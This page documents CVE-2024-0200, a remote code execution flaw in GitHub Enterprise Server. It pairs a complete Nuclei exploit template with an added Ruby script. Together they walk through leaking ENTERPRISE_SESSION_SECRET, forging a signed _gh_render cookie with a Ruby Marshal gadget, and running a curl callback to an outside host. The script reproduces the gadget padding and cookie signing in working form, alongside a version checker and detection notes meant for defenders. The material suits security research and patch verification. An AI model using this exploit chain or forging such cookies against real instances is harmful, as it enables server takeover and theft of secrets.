CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score Confidence: High
EPSS Percentile: 93.5%
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. Note that the CVSS vector above scores Privileges Required as NONE, while the advisory text (and the template below, which checks for the "admin" organization membership role before proceeding) requires an authenticated organization-owner account.
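The fix versions are per release line, so whether an instance is affected depends on both its minor line and its patch level, and lines older than 3.8 have no listed fix at all. The Ruby below is an added check written for this page, not code from GitHub or from the template: it parses a GHES version string and classifies it against the releases named in the advisory. The installed_version field read from a constructed /api/v3/meta response is an assumed field name; check it against your own instance.

```ruby
require "json"

# Fixed releases named in the advisory text; every 3.12+ release shipped fixed.
FIXED_RELEASES = {
  [3, 8]  => [3, 8, 13],
  [3, 9]  => [3, 9, 8],
  [3, 10] => [3, 10, 5],
  [3, 11] => [3, 11, 3],
}.freeze
FIRST_UNAFFECTED_LINE = [3, 12, 0].freeze

# "3.10.4", "v3.11.3", "3.12" -> [major, minor, patch]; patch defaults to 0.
def parse_ghes_version(s)
  m = /\A\s*v?(\d+)\.(\d+)(?:\.(\d+))?/.match(s.to_s)
  raise ArgumentError, "unparseable GHES version: #{s.inspect}" unless m
  [m[1].to_i, m[2].to_i, m[3].to_i]
end

# Fixed release for the version's line, or nil when the advisory lists none
# (3.7 and earlier are affected and only an upgrade across lines helps).
def fixed_release_for(version)
  fix = FIXED_RELEASES[parse_ghes_version(version)[0, 2]]
  fix && fix.join(".")
end

# :patched or :vulnerable for CVE-2024-0200.
def cve_2024_0200_status(version)
  v = parse_ghes_version(version)
  return :patched if (v <=> FIRST_UNAFFECTED_LINE) >= 0
  fix = FIXED_RELEASES[v[0, 2]]
  fix && (v <=> fix) >= 0 ? :patched : :vulnerable
end

# GHES reports its version as "installed_version" in the /api/v3/meta
# response (assumed field name). The sample below is constructed.
def status_from_meta_json(json_text)
  cve_2024_0200_status(JSON.parse(json_text).fetch("installed_version"))
end

SAMPLE_META = '{"verifiable_password_authentication": true, "installed_version": "3.10.4"}'.freeze

if $PROGRAM_NAME == __FILE__
  %w[3.7.19 3.8.12 3.8.13 3.11.2 3.11.3 3.12.0].each do |v|
    puts "#{v}: #{cve_2024_0200_status(v)} (fix: #{fixed_release_for(v) || 'none listed'})"
  end
  puts "meta sample: #{status_from_meta_json(SAMPLE_META)}"
end
```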
id: CVE-2024-0200

info:
  name: Github Enterprise Authenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
  reference:
    - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
    - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.10.5
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.11.3
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.8.13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0200
    cwe-id: CWE-470
    epss-score: 0.06844
    epss-percentile: 0.93885
    cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: github
    product: "enterprise_server"
    shodan-query:
      - "title:\"GitHub Enterprise\""
      - micro focus dsd
    fofa-query: "app=\"Github-Enterprise\""
  tags: cve,cve2024,rce,github,enterprise

variables:
  username: "{{username}}"
  password: "{{password}}"
  # OAST callback. The trailing "?" makes the padding appended below part of
  # the URL query string instead of part of the shell command.
  oast: "curl {{interactsh-url}}/?"
  padstr: "{{randstr}}"
  # The Marshal blob carries a hard-coded string length (0x02 0x36 0x01 =
  # 310 bytes = "99999999; " + 300), so the command must be padded to exactly 300.
  payload: '{{padding(oast,padstr,300)}}'
  # Ruby Marshal gadget: ActiveSupport DeprecatedInstanceVariableProxy wrapping an
  # Aqueduct::Worker::Worker whose kill_child method passes @child ("99999999; <payload>")
  # to a shell; the ";" ends the intended command and runs the payload.
  marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
  # Rails signed-cookie layout: base64(blob) + "--" + hex(HMAC-SHA1(secret, base64(blob))),
  # keyed with the ENTERPRISE_SESSION_SECRET extracted in request 6 below.
  b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
  digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
  final_payload: "{{ b64_marshal_data + '--' + digest}}"

http:
  # 1. List the organizations the supplied account belongs to (API, basic auth).
  - method: GET
    path:
      - "{{BaseURL}}/api/v3/user/orgs"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    extractors:
      - type: json
        part: body
        name: org_name
        internal: true
        json:
          - ".[].login"

  # 2. Require the organization owner role ("admin" membership) in that org.
  - method: GET
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"role": "admin"'
        part: body

  # 3. Create a repository in the org so the repository_items page in request 6
  #    has at least one repository to render.
  - method: POST
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
    headers:
      Content-Type: application/json
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    body: |
      {
        "name": "{{randstr}}"
      }
    matchers:
      - type: status
        status:
          - 201

  # 4. Fetch the web login form for its CSRF token; cookie-reuse keeps the
  #    session jar for the remaining requests.
  - method: GET
    cookie-reuse: true
    path:
      - "{{BaseURL}}/login"
    extractors:
      - type: regex
        part: body
        internal: true
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'
        name: csrf_token

  # 5. Log in through the web UI; success is a 302 that sets the _gh_render cookie.
  - method: POST
    path:
      - "{{BaseURL}}/session"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "_gh_render"
        part: header

  # 6. Unsafe reflection: rid_key is used as a method name on the org's
  #    repositories. nw_fsck raises, and the error page contains the process
  #    environment, from which ENTERPRISE_SESSION_SECRET is extracted (the regex
  #    matches Ruby's Hash#inspect output).
  - method: GET
    path:
      - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
    extractors:
      - type: regex
        group: 1
        name: ghe_secret
        internal: true
        regex:
          - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
        part: body
    matchers:
      - type: word
        words:
          - 'ENTERPRISE_SESSION_SECRET'
        part: body

  # 7. Present the forged, correctly signed _gh_render cookie. Deserializing the
  #    gadget yields a 500 and the curl payload calls back to interactsh over DNS.
  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      Cookie: _gh_render={{final_payload}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950
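The last request above is the whole exploit in one cookie: a Ruby Marshal gadget, base64-encoded and signed the way Rails' message verifier signs cookies, with the ENTERPRISE_SESSION_SECRET recovered in request 6 as the HMAC key. The Ruby below is an added example written for this page, not part of the template or of GitHub's code. It reproduces the template's b64_marshal_data, digest and final_payload arithmetic, shows why the command is padded to exactly 300 bytes (the blob's Marshal string length prefix is fixed at 310 = 10 + 300, so an unpadded command leaves the deserializer reading the wrong bytes as the string), and includes the server-side verification routine so a forged cookie can be checked the way the server would check it. The blob is copied from the template's marshal_data variable; the repeated-character filler, the secret value and the command are assumptions. Nothing here calls Marshal.load.

```ruby
require "base64"
require "openssl"
require "uri"

# Percent-encoded Ruby Marshal blob copied from the template's marshal_data
# variable. "{{payload}}" is the slot the template fills with the OAST command.
TEMPLATE_MARSHAL_DATA = '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'.freeze

PAYLOAD_WIDTH  = 300           # the template's padding(oast, padstr, 300)
COMMAND_PREFIX = "99999999; "  # "<pid>; <command>": the ';' ends what kill_child runs and starts ours

# Mirror of the template's padding(): extend the command to exactly PAYLOAD_WIDTH
# bytes. Nuclei's exact filler semantics are assumed; a repeated character is used.
# The template's command ends in "/?" so the filler becomes a URL query string.
def pad_command(command, filler = "A")
  raise ArgumentError, "command exceeds #{PAYLOAD_WIDTH} bytes" if command.bytesize > PAYLOAD_WIDTH
  command + filler * (PAYLOAD_WIDTH - command.bytesize)
end

# Decode the blob and splice the command in. Decoding happens before the
# substitution so a '%' inside the command is not itself URL-decoded.
def marshal_blob(command, pad: true)
  body = pad ? pad_command(command) : command
  URI.decode_www_form_component(TEMPLATE_MARSHAL_DATA).b.sub("{{payload}}", body.b)
end

# One non-negative Marshal fixnum at byte offset i -> [value, next_offset].
def marshal_fixnum(blob, i)
  b = blob.getbyte(i)
  return [0, i + 1] if b.zero?
  return [b - 5, i + 1] if b >= 5 && b < 128          # single byte: values 0..122
  raise "negative fixnum not expected here" if b > 4   # 1..4 little-endian bytes follow
  n = 0
  b.times { |k| n |= blob.getbyte(i + 1 + k) << (8 * k) }
  [n, i + 1 + b]
end

# The @child string as Marshal.load would read it: its length comes from the
# blob's fixed prefix (0x02 0x36 0x01 = 310), not from what was spliced in.
def declared_child_string(blob)
  i = blob.index('I"'.b) or raise "no string object in blob"
  len, start = marshal_fixnum(blob, i + 2)
  blob.byteslice(start, len)
end

# True when the declared string ends exactly where the next Marshal token
# (the 1-ivar count 0x06 and the ":E" encoding symbol) begins.
def child_string_well_formed?(blob)
  i = blob.index('I"'.b) or return false
  len, start = marshal_fixnum(blob, i + 2)
  blob.getbyte(start + len) == 0x06 && blob.byteslice(start + len + 1, 3) == ":\x06E".b
end

# Rails MessageVerifier layout, which is what the template's b64_marshal_data,
# digest and final_payload variables compute for the _gh_render cookie:
#   base64(blob) + "--" + hex(HMAC-SHA1(secret, base64(blob)))
def sign_cookie(blob, secret)
  data = Base64.strict_encode64(blob)
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, data)}"
end

def forge_gh_render(secret, command)
  sign_cookie(marshal_blob(command), secret)
end

def constant_time_eq?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server-side counterpart: the blob when the signature is valid, nil otherwise.
# Once the secret has leaked, every attacker-signed cookie passes this check and
# the deserializer behind it receives attacker-chosen objects.
def verify_cookie(cookie, secret)
  data, digest = cookie.to_s.split("--", 2)
  return nil if data.nil? || digest.nil?
  return nil unless constant_time_eq?(digest, OpenSSL::HMAC.hexdigest("SHA1", secret, data))
  Base64.strict_decode64(data)
rescue ArgumentError
  nil
end

if $PROGRAM_NAME == __FILE__
  secret = "leaked-session-secret"   # stands in for the extracted ENTERPRISE_SESSION_SECRET
  cookie = forge_gh_render(secret, "curl http://oast.example/?")  # constructed callback
  puts "declared @child length:  #{declared_child_string(marshal_blob('id')).bytesize}"
  puts "well-formed (padded):    #{child_string_well_formed?(marshal_blob('id'))}"
  puts "well-formed (unpadded):  #{child_string_well_formed?(marshal_blob('id', pad: false))}"
  puts "verifies, right secret:  #{!verify_cookie(cookie, secret).nil?}"
  puts "verifies, wrong secret:  #{!verify_cookie(cookie, 'other').nil?}"
end
```

The verify routine is the useful half for defenders: a WAF or log rule cannot tell a forged _gh_render from a genuine one, because the forgery is correctly signed. The only observable differences are the 500 on an otherwise ordinary GET and, before that, the rid_key=nw_fsck request in step 6.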